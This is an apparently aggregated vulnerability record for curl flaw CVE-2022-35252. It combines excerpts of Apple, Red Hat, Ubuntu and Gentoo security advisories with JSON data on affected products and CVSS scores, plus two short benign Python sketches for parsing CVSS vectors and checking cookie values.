WebKit Available for: macOS Monterey Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: The issue was addressed with improved memory handling. WebKit Bugzilla: 248268 CVE-2023-23518: YeongHyeon Choi (@hyeon101010), Hyeon Park (@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung), JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE WebKit Bugzilla: 248268 CVE-2023-23517: YeongHyeon Choi (@hyeon101010), Hyeon Park (@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung), JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE
Windows Installer Available for: macOS Monterey Impact: An app may be able to bypass Privacy preferences Description: The issue was addressed with improved memory handling. CVE-2023-23508: Mickey Jin (@patch1t)
Additional recognition
Kernel We would like to acknowledge Nick Stenning of Replicate for their assistance.
macOS Monterey 12.6.3 may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/ All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.
The following advisory data is extracted from:
https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0428.json
Red Hat officially shut down their mailing list notifications October 10, 2023. Due to this, Packet Storm has recreated the below data as a reference point to raise awareness. It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.
Summary:
Red Hat Advanced Cluster Management for Kubernetes 2.6.6 General Availability release images, which fix security issues and update container images. Description:
Red Hat Advanced Cluster Management for Kubernetes 2.6.6 images
Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in.
This advisory contains the container images for Red Hat Advanced Cluster Management for Kubernetes, which fix several bugs. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/
Security Fix(es):

* CVE-2023-28856 redis: Insufficient validation of HINCRBYFLOAT command
* CVE-2023-32314 vm2: Sandbox Escape
* CVE-2023-32313 vm2: Inspect Manipulation
- Solution:
For Red Hat Advanced Cluster Management for Kubernetes, see the following documentation for details on how to install the images:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/install/installing#installing-while-connected-online
- Bugs fixed (https://bugzilla.redhat.com/):
2187525 - CVE-2023-28856 redis: Insufficient validation of HINCRBYFLOAT command
2208376 - CVE-2023-32314 vm2: Sandbox Escape
2208377 - CVE-2023-32313 vm2: Inspect Manipulation
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis:          Low: curl security update
Advisory ID:       RHSA-2023:2478-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:2478
Issue date:        2023-05-09
CVE Names:         CVE-2022-35252 CVE-2022-43552
====================================================================
1. Summary:
An update for curl is now available for Red Hat Enterprise Linux 9.
Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
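The CVSS base score referenced here comes with a vector string in a fixed, mechanical format: metric:value pairs joined by slashes. The record later in this entry carries CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L with a base score of 3.7 (LOW). As a minimal sketch for reading such vectors (the function name is illustrative, and no score arithmetic is attempted), the string can be split into its metrics like this:

```python
def parse_cvss_vector(vector: str) -> dict:
    """Split a CVSS v3.x vector string into metric/value pairs.

    Illustrative toy parser only: it reads the vector, it does not
    compute or validate the numeric base score.
    """
    head, _, rest = vector.partition("/")            # "CVSS:3.1" / metric list
    metrics = dict(part.split(":", 1) for part in rest.split("/"))
    metrics["version"] = head.split(":", 1)[1]       # "3.1"
    return metrics


# Vector recorded for CVE-2022-35252 in this entry (base score 3.7, LOW).
m = parse_cvss_vector("CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L")
print(m["AV"], m["AC"], m["A"])  # prints: N H L
```

Splitting the vector this way makes it easy to filter an advisory feed by, say, attack vector (AV) or availability impact (A) without re-deriving the score.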
- Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64
- Description:
The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP.
Security Fix(es):
* curl: Incorrect handling of control code characters in cookies (CVE-2022-35252)

* curl: Use-after-free triggered by an HTTP proxy deny response (CVE-2022-43552)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
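The first of the cookie fixes above concerns cookie values carrying raw control bytes, which a peer server may later reject with 400 responses once they are replayed in a Cookie: header. As a rough illustration of the class of check involved (this is an assumed sketch, not libcurl's code; curl 7.85.0 itself rejects such cookies at parse time, and its exact treatment of the tab character may differ):

```python
def cookie_value_acceptable(value: str) -> bool:
    """Reject cookie values containing control bytes (0x00-0x1F, 0x7F),
    the class of input CVE-2022-35252 concerns.

    Illustrative sketch only, not libcurl's implementation: horizontal
    tab is kept here, but curl's actual rule for tab may differ.
    """
    return not any(
        (ord(ch) < 0x20 and ch != "\t") or ord(ch) == 0x7F
        for ch in value
    )


assert cookie_value_acceptable("abc123")           # ordinary value -> keep
assert not cookie_value_acceptable("abc\x01def")   # control byte -> reject
assert not cookie_value_acceptable("abc\x7f")      # DEL byte -> reject
```

In the fixed curl, the rejection happens when the incoming Set-Cookie value is parsed, so a hostile "sister site" can no longer poison the cookie jar for its siblings.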
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.2 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
2120718 - CVE-2022-35252 curl: Incorrect handling of control code characters in cookies
2152652 - CVE-2022-43552 curl: Use-after-free triggered by an HTTP proxy deny response
- Package List:
Red Hat Enterprise Linux AppStream (v. 9):
aarch64: curl-debuginfo-7.76.1-23.el9.aarch64.rpm curl-debugsource-7.76.1-23.el9.aarch64.rpm curl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm libcurl-debuginfo-7.76.1-23.el9.aarch64.rpm libcurl-devel-7.76.1-23.el9.aarch64.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm
ppc64le: curl-debuginfo-7.76.1-23.el9.ppc64le.rpm curl-debugsource-7.76.1-23.el9.ppc64le.rpm curl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm libcurl-debuginfo-7.76.1-23.el9.ppc64le.rpm libcurl-devel-7.76.1-23.el9.ppc64le.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm
s390x: curl-debuginfo-7.76.1-23.el9.s390x.rpm curl-debugsource-7.76.1-23.el9.s390x.rpm curl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm libcurl-debuginfo-7.76.1-23.el9.s390x.rpm libcurl-devel-7.76.1-23.el9.s390x.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm
x86_64: curl-debuginfo-7.76.1-23.el9.i686.rpm curl-debuginfo-7.76.1-23.el9.x86_64.rpm curl-debugsource-7.76.1-23.el9.i686.rpm curl-debugsource-7.76.1-23.el9.x86_64.rpm curl-minimal-debuginfo-7.76.1-23.el9.i686.rpm curl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm libcurl-debuginfo-7.76.1-23.el9.i686.rpm libcurl-debuginfo-7.76.1-23.el9.x86_64.rpm libcurl-devel-7.76.1-23.el9.i686.rpm libcurl-devel-7.76.1-23.el9.x86_64.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.i686.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm
Red Hat Enterprise Linux BaseOS (v. 9):
Source: curl-7.76.1-23.el9.src.rpm
aarch64: curl-7.76.1-23.el9.aarch64.rpm curl-debuginfo-7.76.1-23.el9.aarch64.rpm curl-debugsource-7.76.1-23.el9.aarch64.rpm curl-minimal-7.76.1-23.el9.aarch64.rpm curl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm libcurl-7.76.1-23.el9.aarch64.rpm libcurl-debuginfo-7.76.1-23.el9.aarch64.rpm libcurl-minimal-7.76.1-23.el9.aarch64.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm
ppc64le: curl-7.76.1-23.el9.ppc64le.rpm curl-debuginfo-7.76.1-23.el9.ppc64le.rpm curl-debugsource-7.76.1-23.el9.ppc64le.rpm curl-minimal-7.76.1-23.el9.ppc64le.rpm curl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm libcurl-7.76.1-23.el9.ppc64le.rpm libcurl-debuginfo-7.76.1-23.el9.ppc64le.rpm libcurl-minimal-7.76.1-23.el9.ppc64le.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm
s390x: curl-7.76.1-23.el9.s390x.rpm curl-debuginfo-7.76.1-23.el9.s390x.rpm curl-debugsource-7.76.1-23.el9.s390x.rpm curl-minimal-7.76.1-23.el9.s390x.rpm curl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm libcurl-7.76.1-23.el9.s390x.rpm libcurl-debuginfo-7.76.1-23.el9.s390x.rpm libcurl-minimal-7.76.1-23.el9.s390x.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm
x86_64: curl-7.76.1-23.el9.x86_64.rpm curl-debuginfo-7.76.1-23.el9.i686.rpm curl-debuginfo-7.76.1-23.el9.x86_64.rpm curl-debugsource-7.76.1-23.el9.i686.rpm curl-debugsource-7.76.1-23.el9.x86_64.rpm curl-minimal-7.76.1-23.el9.x86_64.rpm curl-minimal-debuginfo-7.76.1-23.el9.i686.rpm curl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm libcurl-7.76.1-23.el9.i686.rpm libcurl-7.76.1-23.el9.x86_64.rpm libcurl-debuginfo-7.76.1-23.el9.i686.rpm libcurl-debuginfo-7.76.1-23.el9.x86_64.rpm libcurl-minimal-7.76.1-23.el9.i686.rpm libcurl-minimal-7.76.1-23.el9.x86_64.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.i686.rpm libcurl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2022-35252 https://access.redhat.com/security/cve/CVE-2022-43552 https://access.redhat.com/security/updates/classification/#low https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.2_release_notes/index
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2023 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBZFo0V9zjgjWX9erEAQhmTw/9FUwLCGRKCmddNVTMAaay54EPggJFOPKx nN06YIqiK5arkX4SD58YZrX9J0gUZcwGs6s5WO35pG3F+qJXhe8E8fbzavqRG5NB oxG+pDC5+6xQxK41tkuLYJoUhF1w4yG8SuMSzroLcpbut/MAjKGGw4qgyNGit1Su xFGrDTyFxtj+tUZIQCil0HAqlXswQ7G2ukB9kQBpxNRfR0V2ANfmfkkGj8+xWauh L1PcaDezNWgAbgWbuf3mHNiwDMxWsNfcwCbx3P8sF+vRe7q5RdIFNL1oXJkPxQVy C6L29KcaLYxToNmUNyrOncWAj8KSlrDngVq3NXnG34lVzqz2t/ouc/0lX4Jc9qTL mGwYoXvlTqQgV4hGQPfDufApaukxgZfcSidSfqlNt1amYYNiYcvIyf15dht87ipB 27ahZWDKvunB4gqMG62XNHyiu9bKmDCyL57ggUBt3wxJ7H9M/OgjsI7C/i/10SMT D75GjYaU2TWyGLd4SvbV6/3pA3zAZ0Ffqc66uANwfBXC7jFd2/ykEBir3vJYTq17 r2YWYgH2sma5kwb7ZHQhLKk+N2a0g1KX+Mr0V2wJ+yAYwkbz6wu/BVDXstBFkumJ /iKmtOn0Mk07wo/3wvWu5M4tk4kZzmLzs1/ybH3GWOUbFUxbqgOos3/0Vi/uSW88 Yxf4bV/uBmU=HlZ2 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Description:
VolSync is a Kubernetes operator that enables asynchronous replication of persistent volumes within a cluster, or across clusters. After deploying the VolSync operator, it can create and maintain copies of your persistent data.
For more information about VolSync, see:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/add-ons/add-ons-overview#volsync
or the VolSync open source community website at: https://volsync.readthedocs.io/en/stable/.
Security fix(es):

* CVE-2023-3089 openshift: OCP & FIPS mode
- Bugs fixed (https://bugzilla.redhat.com/):
2212085 - CVE-2023-3089 openshift: OCP & FIPS mode
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "universal forwarder",
"scope": "eq",
"trust": 1.0,
"vendor": "splunk",
"version": "9.1.0"
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "bootstrap os",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solidfire",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.6"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "12.6.3"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.12"
},
{
"_id": null,
"model": "curl",
"scope": "lt",
"trust": 1.0,
"vendor": "haxx",
"version": "7.85.0"
},
{
"_id": null,
"model": "hci management node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "element software",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "12.0.0"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "11.7.3"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.0"
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "11.0"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-35252"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "176746"
},
{
"db": "PACKETSTORM",
"id": "172378"
},
{
"db": "PACKETSTORM",
"id": "172587"
},
{
"db": "PACKETSTORM",
"id": "172195"
},
{
"db": "PACKETSTORM",
"id": "174080"
}
],
"trust": 0.5
},
"cve": "CVE-2022-35252",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "LOW",
"baseScore": 3.7,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.2,
"id": "CVE-2022-35252",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-35252",
"trust": 1.0,
"value": "LOW"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-35252",
"trust": 1.0,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-202208-4523",
"trust": 0.6,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202208-4523"
},
{
"db": "NVD",
"id": "CVE-2022-35252"
},
{
"db": "NVD",
"id": "CVE-2022-35252"
}
]
},
"description": {
"_id": null,
"data": "When curl is used to retrieve and parse cookies from a HTTP(S) server, itaccepts cookies using control codes that when later are sent back to a HTTPserver might make the server return 400 responses. Effectively allowing a\"sister site\" to deny service to all siblings. A security vulnerability exists in curl versions 4.9 through 7.84. ==========================================================================\nUbuntu Security Notice USN-5587-1\nSeptember 01, 2022\n\ncurl vulnerability\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 22.04 LTS\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS\n- Ubuntu 16.04 ESM\n- Ubuntu 14.04 ESM\n\nSummary:\n\ncurl could be denied access to a HTTP(S) content if it recieved\na specially crafted cookie. \n\nSoftware Description:\n- curl: HTTP, HTTPS, and FTP client and client libraries\n\nDetails:\n\nAxel Chong discovered that when curl accepted and sent back\ncookies containing control bytes that a HTTP(S) server might\nreturn a 400 (Bad Request Error) response. A malicious cookie\nhost could possibly use this to cause denial-of-service. 
\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 22.04 LTS:\ncurl 7.81.0-1ubuntu1.4\nlibcurl3-gnutls 7.81.0-1ubuntu1.4\nlibcurl3-nss 7.81.0-1ubuntu1.4\nlibcurl4 7.81.0-1ubuntu1.4\n\nUbuntu 20.04 LTS:\ncurl 7.68.0-1ubuntu2.13\nlibcurl3-gnutls 7.68.0-1ubuntu2.13\nlibcurl3-nss 7.68.0-1ubuntu2.13\nlibcurl4 7.68.0-1ubuntu2.13\n\nUbuntu 18.04 LTS:\ncurl 7.58.0-2ubuntu3.20\nlibcurl3-gnutls 7.58.0-2ubuntu3.20\nlibcurl3-nss 7.58.0-2ubuntu3.20\nlibcurl4 7.58.0-2ubuntu3.20\n\nUbuntu 16.04 ESM:\ncurl 7.47.0-1ubuntu2.19+esm5\nlibcurl3 7.47.0-1ubuntu2.19+esm5\nlibcurl3-gnutls 7.47.0-1ubuntu2.19+esm5\nlibcurl3-nss 7.47.0-1ubuntu2.19+esm5\n\nUbuntu 14.04 ESM:\ncurl 7.35.0-1ubuntu2.20+esm12\nlibcurl3 7.35.0-1ubuntu2.20+esm12\nlibcurl3-gnutls 7.35.0-1ubuntu2.20+esm12\nlibcurl3-nss 7.35.0-1ubuntu2.20+esm12\n\nIn general, a standard system update will make all the necessary changes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202212-01\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: curl: Multiple Vulnerabilities\n Date: December 19, 2022\n Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365\n ID: 202212-01\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n=======\nMultiple vulnerabilities have been found in curl, the worst of which\ncould result in arbitrary code execution. \n\nBackground\n=========\nA command line tool and library for transferring data with URLs. 
\n\nAffected packages\n================\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/curl \u003c 7.86.0 \u003e= 7.86.0\n\nDescription\n==========\nMultiple vulnerabilities have been discovered in curl. Please review the\nCVE identifiers referenced below for details. \n\nImpact\n=====\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n=========\nThere is no known workaround at this time. \n\nResolution\n=========\nAll curl users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/curl-7.86.0\"\n\nReferences\n=========\n[ 1 ] CVE-2021-22922\n https://nvd.nist.gov/vuln/detail/CVE-2021-22922\n[ 2 ] CVE-2021-22923\n https://nvd.nist.gov/vuln/detail/CVE-2021-22923\n[ 3 ] CVE-2021-22925\n https://nvd.nist.gov/vuln/detail/CVE-2021-22925\n[ 4 ] CVE-2021-22926\n https://nvd.nist.gov/vuln/detail/CVE-2021-22926\n[ 5 ] CVE-2021-22945\n https://nvd.nist.gov/vuln/detail/CVE-2021-22945\n[ 6 ] CVE-2021-22946\n https://nvd.nist.gov/vuln/detail/CVE-2021-22946\n[ 7 ] CVE-2021-22947\n https://nvd.nist.gov/vuln/detail/CVE-2021-22947\n[ 8 ] CVE-2022-22576\n https://nvd.nist.gov/vuln/detail/CVE-2022-22576\n[ 9 ] CVE-2022-27774\n https://nvd.nist.gov/vuln/detail/CVE-2022-27774\n[ 10 ] CVE-2022-27775\n https://nvd.nist.gov/vuln/detail/CVE-2022-27775\n[ 11 ] CVE-2022-27776\n https://nvd.nist.gov/vuln/detail/CVE-2022-27776\n[ 12 ] CVE-2022-27779\n https://nvd.nist.gov/vuln/detail/CVE-2022-27779\n[ 13 ] CVE-2022-27780\n https://nvd.nist.gov/vuln/detail/CVE-2022-27780\n[ 14 ] CVE-2022-27781\n https://nvd.nist.gov/vuln/detail/CVE-2022-27781\n[ 15 ] CVE-2022-27782\n https://nvd.nist.gov/vuln/detail/CVE-2022-27782\n[ 16 ] CVE-2022-30115\n https://nvd.nist.gov/vuln/detail/CVE-2022-30115\n[ 17 ] CVE-2022-32205\n https://nvd.nist.gov/vuln/detail/CVE-2022-32205\n[ 18 ] 
CVE-2022-32206\n https://nvd.nist.gov/vuln/detail/CVE-2022-32206\n[ 19 ] CVE-2022-32207\n https://nvd.nist.gov/vuln/detail/CVE-2022-32207\n[ 20 ] CVE-2022-32208\n https://nvd.nist.gov/vuln/detail/CVE-2022-32208\n[ 21 ] CVE-2022-32221\n https://nvd.nist.gov/vuln/detail/CVE-2022-32221\n[ 22 ] CVE-2022-35252\n https://nvd.nist.gov/vuln/detail/CVE-2022-35252\n[ 23 ] CVE-2022-35260\n https://nvd.nist.gov/vuln/detail/CVE-2022-35260\n[ 24 ] CVE-2022-42915\n https://nvd.nist.gov/vuln/detail/CVE-2022-42915\n[ 25 ] CVE-2022-42916\n https://nvd.nist.gov/vuln/detail/CVE-2022-42916\n\nAvailability\n===========\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202212-01\n\nConcerns?\n========\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n======\nCopyright 2022 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2023-01-23-5 macOS Monterey 12.6.3\n\nmacOS Monterey 12.6.3 addresses the following issues. \nInformation about the security content is also available at\nhttps://support.apple.com/HT213604. \n\nAppleMobileFileIntegrity\nAvailable for: macOS Monterey\nImpact: An app may be able to access user-sensitive data\nDescription: This issue was addressed by enabling hardened runtime. \nCVE-2023-23499: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n(wojciechregula.blog)\n\ncurl\nAvailable for: macOS Monterey\nImpact: Multiple issues in curl\nDescription: Multiple issues were addressed by updating to curl\nversion 7.86.0. 
\nCVE-2022-42915\nCVE-2022-42916\nCVE-2022-32221\nCVE-2022-35260\n\ncurl\nAvailable for: macOS Monterey\nImpact: Multiple issues in curl\nDescription: Multiple issues were addressed by updating to curl\nversion 7.85.0. \nCVE-2022-35252\n\ndcerpc\nAvailable for: macOS Monterey\nImpact: Mounting a maliciously crafted Samba network share may lead\nto arbitrary code execution\nDescription: A buffer overflow issue was addressed with improved\nmemory handling. \nCVE-2023-23513: Dimitrios Tatsis and Aleksandar Nikolic of Cisco\nTalos\n\nDiskArbitration\nAvailable for: macOS Monterey\nImpact: An encrypted volume may be unmounted and remounted by a\ndifferent user without prompting for the password\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2023-23493: Oliver Norpoth (@norpoth) of KLIXX GmbH (klixx.com)\n\nDriverKit\nAvailable for: macOS Monterey\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: A type confusion issue was addressed with improved\nchecks. \nCVE-2022-32915: Tommy Muir (@Muirey03)\n\nIntel Graphics Driver\nAvailable for: macOS Monterey\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: The issue was addressed with improved bounds checks. \nCVE-2023-23507: an anonymous researcher\n\nKernel\nAvailable for: macOS Monterey\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: The issue was addressed with improved memory handling. \nCVE-2023-23504: Adam Doup\u00e9 of ASU SEFCOM\n\nKernel\nAvailable for: macOS Monterey\nImpact: An app may be able to determine kernel memory layout\nDescription: An information disclosure issue was addressed by\nremoving the vulnerable code. \nCVE-2023-23502: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. 
(@starlabs_sg)\n\nPackageKit\nAvailable for: macOS Monterey\nImpact: An app may be able to gain root privileges\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2023-23497: Mickey Jin (@patch1t)\n\nScreen Time\nAvailable for: macOS Monterey\nImpact: An app may be able to access information about a user\u2019s\ncontacts\nDescription: A privacy issue was addressed with improved private data\nredaction for log entries. \nCVE-2023-23505: Wojciech Regula of SecuRing (wojciechregula.blog)\n\nWeather\nAvailable for: macOS Monterey\nImpact: An app may be able to bypass Privacy preferences\nDescription: The issue was addressed with improved memory handling. \nCVE-2023-23511: Wojciech Regula of SecuRing (wojciechregula.blog), an\nanonymous researcher\n\nWebKit\nAvailable for: macOS Monterey\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: The issue was addressed with improved memory handling. \nWebKit Bugzilla: 248268\nCVE-2023-23518: YeongHyeon Choi (@hyeon101010), Hyeon Park\n(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),\nJunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE\nWebKit Bugzilla: 248268\nCVE-2023-23517: YeongHyeon Choi (@hyeon101010), Hyeon Park\n(@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung),\nJunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE\n\nWindows Installer\nAvailable for: macOS Monterey\nImpact: An app may be able to bypass Privacy preferences\nDescription: The issue was addressed with improved memory handling. \nCVE-2023-23508: Mickey Jin (@patch1t)\n\nAdditional recognition\n\nKernel\nWe would like to acknowledge Nick Stenning of Replicate for their\nassistance. 
\n\nmacOS Monterey 12.6.3 may be obtained from the Mac App Store or\nApple\u0027s Software Downloads web site:\nhttps://support.apple.com/downloads/\nAll information is also posted on the Apple Security Updates\nweb site: https://support.apple.com/en-us/HT201222. \n\nThe following advisory data is extracted from:\n\nhttps://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0428.json\n\nRed Hat officially shut down their mailing list notifications October 10, 2023. Due to this, Packet Storm has recreated the below data as a reference point to raise awareness. It must be noted that due to an inability to easily track revision updates without crawling Red Hat\u0027s archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment. Summary:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.6.6 General\nAvailability release images, which fix security issues and update container\nimages. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.6.6 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. \n\nThis advisory contains the container images for Red Hat Advanced Cluster\nManagement for Kubernetes, which fix several bugs. 
